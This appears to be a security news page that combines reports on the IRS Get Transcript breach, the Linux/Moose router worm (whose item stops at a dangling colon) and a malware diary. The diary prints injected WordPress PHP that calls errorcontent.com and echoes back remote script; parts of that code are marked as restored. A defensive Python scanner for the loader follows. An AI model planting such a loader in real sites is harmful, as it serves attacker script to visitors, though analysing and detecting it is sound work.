Information Security News
In an official statement issued today, the IRS announced that it has shut down an online service to obtain tax records after determining that "unusual activity had taken place on the application, which indicates that unauthorized third parties had access to some accounts on the transcript application." An initial review of that activity revealed "access was gained to more than 100,000 accounts through the Get Transcript application," according to the IRS statement.
After the IRS disclosed more information, it became clear the user data was not obtained because of a direct hack of government systems. Rather, weak authentication used by the IRS to protect access to taxpayer data is likely at fault. The attackers were able to acquire taxpayer records using stolen personal identifying information, possibly pulled from online financial fraud marketplaces.
The Get Transcript application, a feature of the IRS' site that allows taxpayers to download tax return and tax payment transaction data, was apparently targeted by financial fraudsters between February and mid-May. The service was shut down last week as the IRS investigated the activity, which may have been linked to the fraudulent filing of tax returns and transfer of tax refunds. Attempts were made to access over 200,000 accounts; roughly half failed because incorrect information was entered during the IRS' authentication process.
A worm that targets cable and DSL modems, home routers, and other embedded computers is turning those devices into a proxy network for launching armies of fraudulent Instagram, Twitter, and Vine accounts as well as fake accounts on other social networks. The new worm can also hijack routers' DNS service to route requests to a malicious server, steal unencrypted social media cookies such as those used by Instagram, and then use those cookies to add "follows" to fraudulent accounts. The worm can also spread itself to other embedded systems on the local network that run Linux-based operating systems.
The malware, dubbed "Linux/Moose" by Olivier Bilodeau and Thomas Dupuy of the security firm ESET Canada Research, exploits routers open to connections from the Internet via Telnet by performing brute-force login attempts using default or common administrative credentials. Once connected, the worm installs itself on the targeted device.
Moose spreads itself using a file named elan2—"élan" is the French word for moose, Bilodeau and Dupuy explained in their report. Once installed, the malware begins to watch traffic passing through the router for unencrypted cookies from Web browsers and mobile applications, which may be passed to unencrypted sites that leverage social network features:
Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments for readability):
#2b8008#
@error_reporting(0); /* turn off error reporting */
@ini_set('display_errors', 0); /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];
/* only run the code if this is Chrome or IE and not a bot */
if (( preg_match('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match('/bot/i', $wp_mezd8610))) {
    # Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]
    # (the original spells the host name out of concatenated string fragments; written plainly here)
    $wp_mezd098610 = "http://errorcontent.com/content/?ip=" . $_SERVER['REMOTE_ADDR'] . "&referer=" . urlencode($_SERVER['HTTP_HOST']) . "&ua=" . urlencode($wp_mezd8610);
    # check if we have the curl extension installed (the body of this branch did not survive extraction; restored as a plain fetch of the URL)
    if (function_exists('curl_init') && function_exists('curl_exec')) {
        $ch = curl_init($wp_mezd098610); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $wp_8610mezd = curl_exec($ch); curl_close($ch);
    }
    # if we dont have curl, try file_get_contents which requires allow_url_fopen.
    elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) { $wp_8610mezd = @file_get_contents($wp_mezd098610); }
    # or try fopen as a last resort
    elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $wp_8610mezd = @stream_get_contents(@fopen($wp_mezd098610, 'r')); }
}
# The data retrieved will be echoed back to the user if it starts with the string scr.
if (substr($wp_8610mezd, 1, 3) === 'scr') { echo $wp_8610mezd; }
I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com?
According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.
---
Johannes B. Ullrich, Ph.D.
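A defender-side check for the pattern in the diary above, added here as an example and not part of the diary: a small Python scanner that flags the indicators visible in the quoted snippet (the "#2b8008#" wrapper marker, the errorcontent.com host even when it is assembled from concatenated fragments, the $wp_ variable naming, the browser-only gate and the remote-fetch fallback chain). The sample PHP inputs are constructed, and the indicator names and the verdict rule are my own choices.

```python
"""Scan PHP source for the errorcontent.com loader quoted above (added example)."""
import re

# Indicators visible in the quoted snippet: the "#2b8008#" wrapper comment, the
# $wp_<letters><digits> variable names, the browser-only gate and the fetch chain.
MARKER_RE = re.compile(r"#/?[0-9a-f]{6}#")
VAR_RE = re.compile(r"\$wp_(?:[a-z]{4}\d{4,6}|\d{4}[a-z]{4})\b")
UA_GATE_RE = re.compile(r"""preg_match\s*\(\s*['"]/Gecko\|MSIE/i['"]""")
BOT_GATE_RE = re.compile(r"""!\s*preg_match\s*\(\s*['"]/bot/i['"]""")
FETCH_RE = re.compile(r"\b(?:curl_exec|file_get_contents|stream_get_contents)\s*\(")
LOADER_SET = {"browser_only_gate", "remote_fetch", "wp_random_vars"}

def scan_php(source: str) -> dict:
    """Return the indicators present in one PHP source plus a verdict."""
    found = []
    if MARKER_RE.search(source):
        found.append("marker_comment")
    # Drop quotes, dots and whitespace so "error"."content".".com" reads as errorcontentcom.
    flattened = re.sub(r"""[\s.'"]""", "", source.lower())
    if "errorcontentcom" in flattened:
        found.append("c2_domain")
    if len(set(VAR_RE.findall(source))) >= 2:
        found.append("wp_random_vars")
    if UA_GATE_RE.search(source) and BOT_GATE_RE.search(source):
        found.append("browser_only_gate")
    if FETCH_RE.search(source):
        found.append("remote_fetch")
    # Marker or hard-coded host is decisive alone; otherwise require the whole loader shape.
    decisive = "marker_comment" in found or "c2_domain" in found
    return {"suspicious": decisive or LOADER_SET <= set(found), "indicators": found}

def scan_file(path: str) -> dict:
    """Scan one file on disk; undecodable bytes are ignored."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return scan_php(fh.read())

# Constructed, condensed copy of the injection quoted above (not a live capture).
INFECTED = r'''<?php
#2b8008#
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610))){
$wp_mezd098610 = "http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR'];
$wp_8610mezd = @file_get_contents($wp_mezd098610);
if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }}
'''
# Constructed benign theme code that also sniffs the user agent.
CLEAN = r'''<?php
if (preg_match('/MSIE/i', $_SERVER['HTTP_USER_AGENT'])) { echo "legacy browser"; }
'''
```

Run scan_file() over a site's wp-content and theme PHP files; a hit with only "remote_fetch" or only "wp_random_vars" is not flagged, so the verdict stays quiet on ordinary plugin code.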
Posted by InfoSec News on May 26:
http://www.theage.com.au/it-pro/security-it/this-is-just-the-tip-of-the-iceberg-aeroplane-hacking-case-points-to-deeper-cyber-issues-20150526-gh9n4y.html
http://www.defenseone.com/technology/2015/05/pentagon-rethinking-475-million-cyber-defense-proposal/113635/
http://www.computerworld.com/article/2925849/malware-cybercrime/full-adult-friend-finder-database-offered-up-for-17k-worth-of-bitcoins.html